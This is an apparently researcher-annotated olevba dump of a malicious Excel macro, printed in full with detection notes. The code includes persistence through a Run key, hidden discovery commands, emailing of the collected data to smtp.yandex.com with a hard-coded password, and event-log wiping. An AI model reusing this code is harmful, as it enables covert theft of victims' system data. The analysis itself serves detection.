maldoc
## uploaded by @JohnLaTwC | |
## sample hash 9876757cd03dd2e32e3187d55f934541bfe044bdfa18841523c00173f3963eb5 | |
olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: 9876757cd03dd2e32e3187d55f934541bfe044bdfa18841523c00173f3963eb5 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO Module1.bas | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
' ===== ANALYST NOTES (sample 9876757c...) ==================================
' Excel auto-execute macro (Auto_Open runs when macros are enabled on open).
' Observed behaviour, in order:
'   1. Drops a VBScript collector to %temp%\Schedule.vbs (lines a(1)..a(72)),
'      copies it to <SystemDrive>:\Perflog (attrib +h +s) and registers it
'      under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\StartScript.
'   2. Runs 22 host/domain discovery commands through cmd.exe (hidden window)
'      into %temp%\result.txt, appends a recursive listing of <drive>:\Users,
'      and packs the file with makecab into %temp%\result.zip.
'   3. After a connectivity check (HTTP GET www.google.com) mails the archive
'      via CDO over authenticated SMTP (smtp.yandex.com:465, SSL) using
'      credentials hard-coded in the macro. Recipient/sender addresses appear
'      redacted in this listing ("[email protected]"); the password literal
'      is still visible below.
' No exploit is used; everything runs with the privileges of the user who
' enabled macros. Rough ATT&CK mapping: T1059.005 (VBScript), T1547.001
' (Run key), T1564.001 (hidden dir), T1082/T1087/T1016/T1518.001 (discovery),
' T1560.001 (makecab), T1048 (exfil over SMTP).
' Detection hooks: EXCEL.EXE spawning wmic.exe / cmd.exe with the command
' lines below; file writes to %temp%\Schedule.vbs and *:\Perflog\Schedule.vbs;
' the StartScript Run value; outbound 465/tcp to smtp.yandex.com from an
' Office or wscript process.
' ==========================================================================
Sub Auto_Open() | |
Dim my_file, Position As Integer | |
Dim text_line, file_name, str1 As String | |
Dim content, containear(1 To 22) As String | |
Dim wsh As Object | |
Dim temp As String | |
' Single WScript.Shell instance used for every process launch (wsh.Run) and
' for %temp% expansion / registry access throughout the macro.
Set wsh = VBA.CreateObject("WScript.Shell") | |
Dim waitOnReturn As Boolean: waitOnReturn = True | |
Dim windowStyle As Integer: windowStyle = 1 | |
' "OS check": InStr returns 0 when "Win" is absent, so the test `os_check >= 0`
' at the If below is always true - the guard never actually gates execution.
os_detect = Application.OperatingSystem | |
os_check = InStr(1, os_detect, "Win", vbTextCompare) | |
' Staging paths for the in-macro collection run (cleaned up later in read()).
temp = wsh.ExpandEnvironmentStrings("%temp%") + "\result.txt" | |
tempzip = wsh.ExpandEnvironmentStrings("%temp%") + "\result.zip" | |
' Resolve the system drive letter: run `wmic OS GET SystemDrive /VALUE`
' (output like "SystemDrive=C:") and keep the character before the first ':'.
' Output is never declared, so it starts Empty and becomes e.g. "C".
s = CreateObject("WScript.Shell").Exec("wmic OS GET SystemDrive /VALUE").StdOut.ReadAll | |
str1 = s | |
Position = InStr(1, str1, ":", vbTextCompare) | |
Output = Output + Left(Mid(str1, (Position) - 1), 1) | |
If os_check >= 0 Then | |
'*********************************************************************************************************** | |
' ---- Stage 2 dropper: write %temp%\Schedule.vbs from the a() array ----
' The VBS repeats the collection + SMTP exfil below, so it re-runs at every
' logon once the Run key is set. 19 discovery commands go to %temp%\Logs.txt.
Dim TextFile As Integer | |
Dim FilePath As String | |
Dim a(72) | |
FilePath = wsh.ExpandEnvironmentStrings("%temp%") + "\Schedule.vbs" | |
TextFile = FreeFile | |
Open FilePath For Output As TextFile | |
a(1) = "Dim my_file, Position" | |
a(2) = "Dim text_line, file_name, str1" | |
a(3) = "Dim containear(19)" | |
a(4) = "Dim wsh" | |
a(5) = "Set wsh = CreateObject(""WScript.Shell"")" | |
a(6) = "Dim waitOnReturn: waitOnReturn = True" | |
a(7) = "Dim windowStyle: windowStyle = 1" | |
a(8) = "temp2 = wsh.ExpandEnvironmentStrings(""%temp%"")+""\Logs.txt""" | |
a(9) = "temp2zip = wsh.ExpandEnvironmentStrings(""%temp%"")+""\Logs.zip""" | |
' Discovery set in the dropped script: date/time, AV product (SecurityCenter2
' WMI), services, tasklist, installed software, local and domain users,
' firewall rules, ipconfig/arp, net view, ping to www.ford.com and
' 104.74.193.93 (connectivity probes; no payload is fetched from them).
a(10) = "containear(1) = ""echo ---------- date is ---------- >%temp%\Logs.txt && Date /t>>%temp%\Logs.txt && time /t>>%temp%\Logs.txt""" | |
a(11) = "containear(2) = ""echo ---------- Antivirus ---------- >>%temp%\Logs.txt && WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List>>%temp%\Logs.txt""" | |
a(12) = "containear(3) = ""echo ---------- Services ---------- >>%temp%\Logs.txt && sc query state= all>>%temp%\Logs.txt""" | |
a(13) = "containear(4) = ""echo ---------- Task list ---------- >>%temp%\Logs.txt && Tasklist>>%temp%\Logs.txt""" | |
a(14) = "containear(5) = ""echo ---------- Software ---------- >>%temp%\Logs.txt && wmic product get name,version>>%temp%\Logs.txt""" | |
a(15) = "containear(6) = ""echo ---------- user_wic ---------- >>%temp%\Logs.txt && wmic useraccount get name>>%temp%\Logs.txt""" | |
a(16) = "containear(7) = ""echo ---------- user_net ---------- >>%temp%\Logs.txt && net user>>%temp%\Logs.txt""" | |
a(17) = "containear(8) = ""echo ---------- current_user ---------- >>%temp%\Logs.txt && echo %username%>>%temp%\Logs.txt""" | |
a(18) = "containear(9) = ""echo ---------- ping_site ---------- >>%temp%\Logs.txt && Ping www.ford.com>>%temp%\Logs.txt""" | |
a(19) = "containear(10) = ""echo ---------- echo firewall_rule ---------- >>%temp%\Logs.txt && netsh advfirewall firewall show rule name=all>>%temp%\Logs.txt""" | |
a(20) = "containear(11) = ""echo ---------- tmpetwork_detail_ipconfig ---------- >>%temp%\Logs.txt && Ipconfig /all>>%temp%\Logs.txt""" | |
a(21) = "containear(12) = ""echo ---------- tmpetwork_detail_arp ---------- >>%temp%\Logs.txt && arp -a>>%temp%\Logs.txt""" | |
a(22) = "containear(13) = ""echo ---------- hosts_of_domain ---------- >>%temp%\Logs.txt && net view>>%temp%\Logs.txt""" | |
a(23) = "containear(14) = ""echo ---------- user_details ---------- >>%temp%\Logs.txt && net user administrator>>%temp%\Logs.txt""" | |
a(24) = "containear(15) = ""echo ---------- users_of_domain ---------- >>%temp%\Logs.txt && net user /domain>>%temp%\Logs.txt""" | |
a(25) = "containear(16) = ""echo ---------- ping_ip ---------- >>%temp%\Logs.txt && Ping 104.74.193.93>>%temp%\Logs.txt""" | |
a(26) = "containear(17) = ""echo ---------- net_user_domain ---------- >>%temp%\Logs.txt && net user /domain>>%temp%\Logs.txt""" | |
a(27) = "containear(18) = ""echo ---------- net_computer_domain ---------- >>%temp%\Logs.txt && net computer /domain>>%temp%\Logs.txt""" | |
a(28) = "containear(19) = ""echo ---------- net_user_%username% ---------- >>%temp%\Logs.txt && net user %username%>>%temp%\Logs.txt""" | |
' Each command runs as `cmd.exe /c...` with window style 0 (hidden), waiting
' for completion; the log is then packed with makecab (a .cab named .zip).
a(29) = "For j = 1 To 19" | |
a(30) = "wsh.Run ""cmd.exe /c"" + containear(j), 0, True" | |
a(31) = "Next" | |
a(32) = "wsh.Run ""cmd.exe /c makecab /V1 %temp%\Logs.txt %temp%\Logs.zip"", 0, True" | |
a(33) = "Set oFSO = CreateObject(""Scripting.FileSystemObject"")" | |
a(34) = "Set oShell = WScript.CreateObject(""WScript.Shell"")" | |
' Connectivity check: one ICMP ping to google.com; exfil only if exit code 0.
a(35) = "strHost = ""google.com""" | |
a(36) = "strPingCommand = ""ping -n 1 "" & strHost" | |
a(37) = "ReturnCode = oShell.Run(strPingCommand, 0, True)" | |
a(38) = "If ReturnCode = 0 Then" | |
a(39) = "strSubject = ""Logs""" | |
a(40) = "strFrom = ""[email protected]""" | |
a(41) = "strTo = ""[email protected]""" | |
a(42) = "strCc = """"" | |
a(43) = "strBcc = """"" | |
a(44) = "strBody = "" "" " | |
' CDO.Message exfil: sendusing=2 (SMTP over network), authenticated,
' smtp.yandex.com:465 with SSL. Same account/password as the in-macro
' exfil further down - a reusable network + credential IOC.
a(45) = "Set CDO_Mail = CreateObject(""CDO.Message"")" | |
a(46) = "Set CDO_Config = CreateObject(""CDO.Configuration"")" | |
a(47) = "CDO_Config.Load -1" | |
a(48) = "Set SMTP_Config = CDO_Config.Fields" | |
a(49) = "With SMTP_Config" | |
a(50) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendusing"") = 2" | |
a(51) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpserver"") = ""smtp.yandex.com""" | |
a(52) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpauthenticate"") = 1" | |
a(53) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendusername"") = ""[email protected]""" | |
a(54) = ".Item(""http://schemas.microsoft.com/cdo/configuration/sendpassword"") = ""ouqttwxssalqrmwe""" | |
a(55) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpserverport"") = 465" | |
a(56) = ".Item(""http://schemas.microsoft.com/cdo/configuration/smtpusessl"") = True" | |
a(57) = ".Update" | |
a(58) = "End With" | |
a(59) = "With CDO_Mail" | |
a(60) = "Set .Configuration = CDO_Config" | |
a(61) = "End With" | |
a(62) = "CDO_Mail.Subject = strSubject" | |
a(63) = "CDO_Mail.From = strFrom" | |
a(64) = "CDO_Mail.To = strTo" | |
a(65) = "CDO_Mail.AddAttachment CStr(temp2zip)" | |
a(66) = "CDO_Mail.TextBody = strBody" | |
a(67) = "CDO_Mail.CC = strCc" | |
a(68) = "CDO_Mail.BCC = strBcc" | |
a(69) = "CDO_Mail.Send" | |
a(70) = "End If" | |
' The dropped script removes its own staging files after sending.
a(71) = "wsh.Run ""cmd.exe /c del %temp%\Logs.txt"", 0, 1" | |
a(72) = "wsh.Run ""cmd.exe /c del %temp%\Logs.zip"", 0, 1" | |
For j = 1 To 72 | |
Print #TextFile, a(j) | |
Next j | |
Close TextFile | |
'************************************************************************************************************* | |
' ---- Persistence ----
' Create <drive>:\Perflog, mark it hidden+system, copy the VBS there, and add
' HKCU\...\CurrentVersion\Run\StartScript pointing at it. RegRead raises an
' error when the value is absent (On Error Resume Next), which is the
' "not yet installed" signal that triggers REG ADD. The .vbs is presumably
' launched at logon by the default script host (wscript.exe) - verify on a
' live host.
wsh.Run "cmd.exe /c mkdir " & Output & ":\Perflog", 0, True | |
wsh.Run "cmd.exe /c attrib +h +s " & Output & ":\Perflog", 0, True | |
wsh.Run "cmd.exe /c copy %temp%\Schedule.vbs " & Output & ":\Perflog\Schedule.vbs", 0, True | |
Dim WshShell As Object | |
Set WshShell = CreateObject("WScript.Shell") | |
On Error Resume Next | |
wsh.RegRead ("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\StartScript") | |
If Err <> 0 Then | |
wsh.Run "cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v StartScript /t REG_SZ /d " + Output + ":\Perflog\Schedule.vbs", 0, True | |
Err.Clear | |
End If | |
'************************************************************************************************************* | |
' Strips data validation from the sheet named "EVALUATION" - presumably the
' decoy/lure content shown to the victim; the sheet itself is not in this dump.
Sheets("EVALUATION").Cells.Validation.Delete | |
' ---- In-macro discovery run (22 commands, appended to %temp%\result.txt) ----
' Superset of the VBS list: adds `ver`, `bcdedit` and a "Directory" header
' that is completed by the `dir /s <drive>:\Users` below.
containear(1) = "echo ---------- date is ---------- >>%temp%\result.txt && Date /t>>%temp%\result.txt && time /t>>%temp%\result.txt" | |
containear(2) = "echo ---------- Antivirus ---------- >>%temp%\result.txt && WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List>>%temp%\result.txt" | |
containear(3) = "echo ---------- Services ---------- >>%temp%\result.txt && sc query state= all>>%temp%\result.txt" | |
containear(4) = "echo ---------- Version Of OS ---------- >>%temp%\result.txt && ver>>%temp%\result.txt" | |
containear(5) = "echo ---------- Task list ---------- >>%temp%\result.txt && Tasklist>>%temp%\result.txt" | |
containear(6) = "echo ---------- Boot Config ---------- >>%temp%\result.txt && Bcdedit>>%temp%\result.txt" | |
containear(7) = "echo ---------- Software ---------- >>%temp%\result.txt && wmic product get name,version>>%temp%\result.txt" | |
containear(8) = "echo ---------- user_wic ---------- >>%temp%\result.txt && wmic useraccount get name>>%temp%\result.txt" | |
containear(9) = "echo ---------- user_net ---------- >>%temp%\result.txt && net user>>%temp%\result.txt" | |
containear(10) = "echo ---------- current_user ---------- >>%temp%\result.txt && echo %username%>>%temp%\result.txt" | |
containear(11) = "echo ---------- ping_site ---------- >>%temp%\result.txt && Ping www.ford.com>>%temp%\result.txt" | |
containear(12) = "echo ---------- echo firewall_rule ---------- >>%temp%\result.txt && netsh advfirewall firewall show rule name=all>>%temp%\result.txt" | |
containear(13) = "echo ---------- tmpetwork_detail_ipconfig ---------- >>%temp%\result.txt && Ipconfig /all>>%temp%\result.txt" | |
containear(14) = "echo ---------- tmpetwork_detail_arp ---------- >>%temp%\result.txt && arp -a>>%temp%\result.txt" | |
containear(15) = "echo ---------- hosts_of_domain ---------- >>%temp%\result.txt && net view>>%temp%\result.txt" | |
containear(16) = "echo ---------- user_details ---------- >>%temp%\result.txt && net user administrator>>%temp%\result.txt" | |
containear(17) = "echo ---------- users_of_domain ---------- >>%temp%\result.txt && net user /domain>>%temp%\result.txt" | |
containear(18) = "echo ---------- ping_ip ---------- >>%temp%\result.txt && Ping 104.74.193.93>>%temp%\result.txt" | |
containear(19) = "echo ---------- net_user_domain ---------- >>%temp%\result.txt && net user /domain>>%temp%\result.txt" | |
containear(20) = "echo ---------- net_computer_domain ---------- >>%temp%\result.txt && net computer /domain>>%temp%\result.txt" | |
containear(21) = "echo ---------- net_user_%username% ---------- >>%temp%\result.txt && net user %username%>>%temp%\result.txt" | |
containear(22) = "echo ---------- Directory ---------- >>%temp%\result.txt" | |
' Hidden window (0), synchronous (True): the victim sees nothing while
' EXCEL.EXE spawns 22 cmd.exe children in a row - a strong process-tree signal.
For j = 1 To 22 | |
wsh.Run "cmd.exe /c" + containear(j), 0, True | |
Next j | |
End If | |
'*********************************************************************************************************** | |
' Full recursive listing of every user profile, then cab the result.
wsh.Run "cmd.exe /c dir /s " & Output & ":\Users>>%temp%\result.txt", 0, True | |
wsh.Run "cmd.exe /c makecab /V1 %temp%\result.txt %temp%\result.zip", 0, True | |
'************************************************************************************************************* | |
' ---- Exfiltration ----
' Connectivity check via an HTTP GET to www.google.com. `New ServerXMLHTTP`
' is early-bound, so the VBA project must carry an MSXML reference (not
' visible in this dump). strT is never assigned - Send gets an Empty body.
' On Error Resume Next masks any failure; exfil runs only when Err = 0.
On Error Resume Next | |
checkInternetConnection = False | |
Set objSvrHTTP = New ServerXMLHTTP | |
objSvrHTTP.Open "GET", "http://www.google.com" | |
objSvrHTTP.SetRequestHeader "Accept", "application/xml" | |
objSvrHTTP.SetRequestHeader "Content-Type", "application/xml" | |
objSvrHTTP.Send strT | |
If Err = 0 Then | |
checkInternetConnection = True | |
strSubject = "Feed back" | |
strFrom = "[email protected]" | |
strTo = "[email protected]" | |
strCc = "" | |
strBcc = "" | |
strBody = " " | |
Set CDO_Mail = CreateObject("CDO.Message") | |
' Any error from here on jumps to Error_Handling: (just before End If),
' i.e. failures are swallowed silently and the macro returns normally.
On Error GoTo Error_Handling | |
Set CDO_Config = CreateObject("CDO.Configuration") | |
CDO_Config.Load -1 | |
Set SMTP_Config = CDO_Config.Fields | |
With SMTP_Config | |
.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 | |
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.yandex.com" | |
.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 | |
.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]" | |
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "ouqttwxssalqrmwe" | |
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465 | |
.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True | |
.Update | |
End With | |
With CDO_Mail | |
Set .Configuration = CDO_Config | |
End With | |
CDO_Mail.Subject = strSubject | |
CDO_Mail.From = strFrom | |
CDO_Mail.To = strTo | |
' Attachment is the makecab archive of result.txt built above.
CDO_Mail.AddAttachment CStr(tempzip) | |
CDO_Mail.TextBody = strBody | |
CDO_Mail.CC = strCc | |
CDO_Mail.BCC = strBcc | |
CDO_Mail.Send | |
Error_Handling: | |
End If | |
End Sub | |
' ===== ANALYST NOTES =======================================================
' Called from Workbook_BeforeClose (see ThisWorkbook module), i.e. when the
' victim closes the file. It copies the collected %temp%\result.txt into the
' workbook itself (Sheet2, column E) and saves, so the document becomes a
' second copy of the loot; then it deletes the %temp% staging files, clears
' every Windows event log, and kills all cmd.exe processes.
' Anti-forensics mapping: T1070.001 (clear event logs), T1070.004 (file
' deletion). Note the persistent copy in <drive>:\Perflog\Schedule.vbs and
' the Run key are NOT removed here - only the %temp% copy is.
' ==========================================================================
Sub read() | |
Set wsh = VBA.CreateObject("WScript.Shell") | |
Dim waitOnReturn As Boolean: waitOnReturn = True | |
temp = wsh.ExpandEnvironmentStrings("%temp%") + "\result.txt" | |
o = 1 | |
file_name = temp | |
my_file = FreeFile() | |
' Read the discovery output line by line into Sheet2!E1, E2, ... (prefixed
' with a space). No error handling: if result.txt is missing this raises
' and the rest of the routine - including the log wipe - does not run.
Open file_name For Input As my_file | |
While Not EOF(my_file) | |
Line Input #my_file, text_line | |
Sheets("Sheet2").Cells(o, "E").Value = " " + text_line | |
o = o + 1 | |
Wend | |
Close #my_file | |
Application.ScreenUpdating = True | |
Application.StatusBar = False | |
' Remove the %temp% staging artifacts (result.txt, result.zip, Schedule.vbs).
wsh.Run "cmd.exe /c del %temp%\result.txt", 0, 1 | |
wsh.Run "cmd.exe /c del %temp%\result.zip", 0, 1 | |
wsh.Run "cmd.exe /c del %temp%\Schedule.vbs", 0, 1 | |
' Enumerate all event logs (wevtutil el) and clear each (wevtutil cl).
' Clearing most logs needs elevation, and the single quotes around '%1' are
' passed to wevtutil as part of the log name, so whether this actually
' succeeds on a real host is unverified - but the attempt itself (wevtutil
' spawned under EXCEL.EXE -> cmd.exe) is a high-fidelity detection.
wsh.Run "cmd.exe /c for /F 'tokens=*' %1 in ('wevtutil.exe el') DO wevtutil.exe cl '%1'", 0, 1 | |
' Force-kills every cmd.exe, via powershell.exe for no functional reason
' (taskkill is a plain executable) - another odd process-tree artifact.
wsh.Run "cmd.exe /c powershell.exe taskkill /f /im cmd.exe", 0, 1 | |
' Persists the Sheet2 contents (the loot) into the document on disk.
ThisWorkbook.Save | |
End Sub | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisWorkbook.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
' Document-close trigger: runs the read() routine in Module1 (loot-to-sheet
' copy, staging-file deletion, event-log wipe, cmd.exe kill, save) when the
' victim closes the workbook. Together with Auto_Open this gives the sample
' an open-time and a close-time execution point.
Private Sub Workbook_BeforeClose(Cancel As Boolean) | |
read | |
End Sub | |
------------------------------------------------------------------------------- | |
VBA MACRO Sheet1.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) | |
------------------------------------------------------------------------------- | |
VBA MACRO Sheet2.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet2' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) | |
------------------------------------------------------------------------------- | |
VBA MACRO Sheet11.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet11' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) |